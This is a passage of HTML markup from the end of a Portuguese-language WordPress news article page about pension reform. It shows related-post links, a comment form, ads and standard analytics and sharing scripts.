		<a href="https://oiguassu.com/seis-cooperativas-da-agricultura-familiar-participam-de-chamada-publica/" title="SEIS COOPERATIVAS DA AGRICULTURA FAMILIAR PARTICIPAM DE CHAMADA PÚBLICA" rel="bookmark">
			SEIS COOPERATIVAS DA AGRICULTURA FAMILIAR PARTICIPAM DE CHAMADA PÚBLICA		</a>
	</h3>
</article>
<hr class="mh-separator content-grid-separator"><article class="mh-col mh-1-4 content-grid post-11993 post type-post status-publish format-standard has-post-thumbnail hentry category-brasil tag-manchete1">
	<div class="content-thumb content-grid-thumb">
		<a href="https://oiguassu.com/petrobras-alavancagem-fica-em-296-vezes-ante-316x-no-3tri17-e-367x-no-fim-de-2017/" title="PETROBRAS: ALAVANCAGEM FICA EM 2,96 VEZES, ANTE 3,16X NO 3TRI17 E 3,67X NO FIM DE 2017"><img width="180" height="101" src="https://oiguassu.com/wp-content/uploads/2018/11/31093_2_EL-180x101.jpg" class="attachment-content-grid size-content-grid wp-post-image" alt="" srcset="https://oiguassu.com/wp-content/uploads/2018/11/31093_2_EL-180x101.jpg 180w, https://oiguassu.com/wp-content/uploads/2018/11/31093_2_EL-260x146.jpg 260w, https://oiguassu.com/wp-content/uploads/2018/11/31093_2_EL-373x210.jpg 373w, https://oiguassu.com/wp-content/uploads/2018/11/31093_2_EL-120x67.jpg 120w" sizes="(max-width: 180px) 100vw, 180px" data-attachment-id="11995" data-permalink="https://oiguassu.com/petrobras-alavancagem-fica-em-296-vezes-ante-316x-no-3tri17-e-367x-no-fim-de-2017/31093_2_el/" data-orig-file="https://oiguassu.com/wp-content/uploads/2018/11/31093_2_EL.jpg" data-orig-size="770,400" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}" data-image-title="31093_2_EL" data-image-description="" data-medium-file="https://oiguassu.com/wp-content/uploads/2018/11/31093_2_EL-300x156.jpg" data-large-file="https://oiguassu.com/wp-content/uploads/2018/11/31093_2_EL.jpg" />		</a>
	</div>
			<p class="entry-meta">
			<span><a href="https://oiguassu.com/category/brasil/" rel="category tag">Brasil</a></span>
		</p>
		<h3 class="entry-title content-grid-title">
		<a href="https://oiguassu.com/petrobras-alavancagem-fica-em-296-vezes-ante-316x-no-3tri17-e-367x-no-fim-de-2017/" title="PETROBRAS: ALAVANCAGEM FICA EM 2,96 VEZES, ANTE 3,16X NO 3TRI17 E 3,67X NO FIM DE 2017" rel="bookmark">
			PETROBRAS: ALAVANCAGEM FICA EM 2,96 VEZES, ANTE 3,16X NO 3TRI17 E 3,67X NO FIM DE 2017		</a>
	</h3>
</article>
<hr class="mh-separator content-grid-separator">		</div><div class="comments-wrap">
<h4 class="comment-section-title"><span class="comment-count">Seja o Primeiro a comentar</span> <span class="comment-count-more">on "GOVERNO ADMITE ABRIR MÃO DE ESTADOS E MUNICÍPIOS NA REFORMA DA PREVIDÊNCIA"</span></h4>
</div>
	<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">Deixe um comentário <small><a rel="nofollow" id="cancel-comment-reply-link" href="/governo-admite-abrir-mao-de-estados-e-municipios-na-reforma-da-previdencia/#respond" style="display:none;">Cancelar resposta</a></small></h3>			<form action="https://oiguassu.com/wp-comments-post.php" method="post" id="commentform" class="comment-form">
				<p class="comment-notes">Seu email não será publicado.</p><p class="comment-form-comment"><label for="comment">Comentário</label><br/><textarea id="comment" name="comment" cols="45" rows="5" aria-required="true"></textarea></p><p class="comment-form-author"><label for="author">Name </label><span class="required">*</span><br/><input id="author" name="author" type="text" value="" size="30" aria-required='true' /></p>
<p class="comment-form-email"><label for="email">Email </label><span class="required">*</span><br/><input id="email" name="email" type="text" value="" size="30" aria-required='true' /></p>
<p class="comment-form-url"><label for="url">Website</label><br/><input id="url" name="url" type="text" value="" size="30" /></p>
<p class="comment-subscription-form"><input type="checkbox" name="subscribe_comments" id="subscribe_comments" value="subscribe" style="width: auto; -moz-appearance: checkbox; -webkit-appearance: checkbox;" /> <label class="subscribe-label" id="subscribe-label" for="subscribe_comments">Notifique-me sobre novos comentários por e-mail.</label></p><p class="comment-subscription-form"><input type="checkbox" name="subscribe_blog" id="subscribe_blog" value="subscribe" style="width: auto; -moz-appearance: checkbox; -webkit-appearance: checkbox;" /> <label class="subscribe-label" id="subscribe-blog-label" for="subscribe_blog">Notifique-me sobre novas publicações por e-mail.</label></p><div class="gglcptch gglcptch_v2"><div id="gglcptch_recaptcha_328683635" class="gglcptch_recaptcha"></div>
				<noscript>
					<div style="width: 302px;">
						<div style="width: 302px; height: 422px; position: relative;">
							<div style="width: 302px; height: 422px; position: absolute;">
								<iframe src="https://www.google.com/recaptcha/api/fallback?k=6LdS0nQUAAAAAAHCLnx2H4lhvCq8kBPHUe6TV0n1" frameborder="0" scrolling="no" style="width: 302px; height:422px; border-style: none;"></iframe>
							</div>
						</div>
						<div style="border-style: none; bottom: 12px; left: 25px; margin: 0px; padding: 0px; right: 25px; background: #f9f9f9; border: 1px solid #c1c1c1; border-radius: 3px; height: 60px; width: 300px;">
							<textarea id="g-recaptcha-response" name="g-recaptcha-response" class="g-recaptcha-response" style="width: 250px !important; height: 40px !important; border: 1px solid #c1c1c1 !important; margin: 10px 25px !important; padding: 0px !important; resize: none !important;"></textarea>
						</div>
					</div>
				</noscript></div><p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Publicar comentário" /> <input type='hidden' name='comment_post_ID' value='18488' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="2a6c09ba8c" /></p><p style="display: none;"><input type="hidden" id="ak_js" name="ak_js" value="40"/></p>			</form>
			</div><!-- #respond -->
		</div>
	<aside class="mh-sidebar">
	<div id="search-2" class="sb-widget clearfix widget_search"><form role="search" method="get" class="search-form" action="https://oiguassu.com/">
				<label>
					<span class="screen-reader-text">Pesquisar por:</span>
					<input type="search" class="search-field" placeholder="Pesquisar &hellip;" value="" name="s" />
				</label>
				<input type="submit" class="search-submit" value="Pesquisar" />
			</form></div><div id="custom_html-7" class="widget_text sb-widget clearfix widget_custom_html"><div class="textwidget custom-html-widget"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- a -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-9260427313362027"
     data-ad-slot="4555141854"
     data-ad-format="auto"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div></div></aside></div>
</div>
<footer class="mh-footer">
		<div class="wrapper-inner clearfix">
			</div>
	<div class="footer-bottom">
		<div class="wrapper-inner clearfix">
						<div class="copyright-wrap">
				<p class="copyright">
					Copyright 2019 | MH Newsdesk by <a href="http://www.mhthemes.com/" title="Premium Magazine WordPress Themes" rel="nofollow">MH Themes</a>				</p>
			</div>
		</div>
	</div>
</footer>

<!-- Infolinks START -->

<script type="text/javascript">
    var infolinks_pid = 3124372; 
    var infolinks_plugin_version = "WP_3.2.3"; 
    var infolinks_resources = "https://resources.infolinks.com/js"; 
</script>
<script type="text/javascript" src="https://resources.infolinks.com/js/infolinks_main.js" ></script>
<!-- Infolinks END -->	<div style="display:none">
	</div>

	<script type="text/javascript">
		window.WPCOM_sharing_counts = {"https:\/\/oiguassu.com\/governo-admite-abrir-mao-de-estados-e-municipios-na-reforma-da-previdencia\/":18488};
	</script>
				<script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201922'></script>
<script type='text/javascript' src='https://secure.gravatar.com/js/gprofiles.js?ver=2019Junaa'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var WPGroHo = {"my_hash":""};
/* ]]> */
</script>
<script type='text/javascript' src='https://oiguassu.com/wp-content/plugins/jetpack/modules/wpgroho.js?ver=4.9.10'></script>
<script type='text/javascript' src='https://oiguassu.com/wp-includes/js/comment-reply.min.js?ver=4.9.10'></script>
<script type='text/javascript' src='https://oiguassu.com/wp-includes/js/wp-embed.min.js?ver=4.9.10'></script>
<script async="async" type='text/javascript' src='https://oiguassu.com/wp-content/plugins/akismet/_inc/form.js?ver=4.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var sharing_js_options = {"lang":"en","counts":"1","is_stats_active":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='https://oiguassu.com/wp-content/plugins/jetpack/_inc/build/sharedaddy/sharing.min.js?ver=6.8'></script>
<script type='text/javascript'>
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-twitter', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomtwitter', 'menubar=1,resizable=1,width=600,height=350' );
				return false;
			});
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-facebook', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomfacebook', 'menubar=1,resizable=1,width=600,height=400' );
				return false;
			});
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-google-plus-1', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomgoogle-plus-1', 'menubar=1,resizable=1,width=480,height=550' );
				return false;
			});
</script>
<script type='text/javascript' data-cfasync="false" async="async" defer="defer" src='https://www.google.com/recaptcha/api.js?render=explicit&#038;ver=1.38'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var gglcptch = {"options":{"version":"v2","sitekey":"6LdS0nQUAAAAAAHCLnx2H4lhvCq8kBPHUe6TV0n1","theme":"light","error":"<strong>Warning<\/strong>:&nbsp;More than one reCAPTCHA has been found in the current form. Please remove all unnecessary reCAPTCHA fields to make it work properly."},"vars":{"visibility":false}};
/* ]]> */
</script>
<script type='text/javascript' src='https://oiguassu.com/wp-content/plugins/google-captcha/js/script.js?ver=1.38'></script>
<script type='text/javascript' src='https://stats.wp.com/e-201922.js' async='async' defer='defer'></script>
<script type='text/javascript'>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:6.8',blog:'12891280',post:'18488',tz:'-3',srv:'oiguassu.com'} ]);
	_stq.push([ 'clickTrackerInit', '12891280', '18488' ]);
</script>
</body>
</html>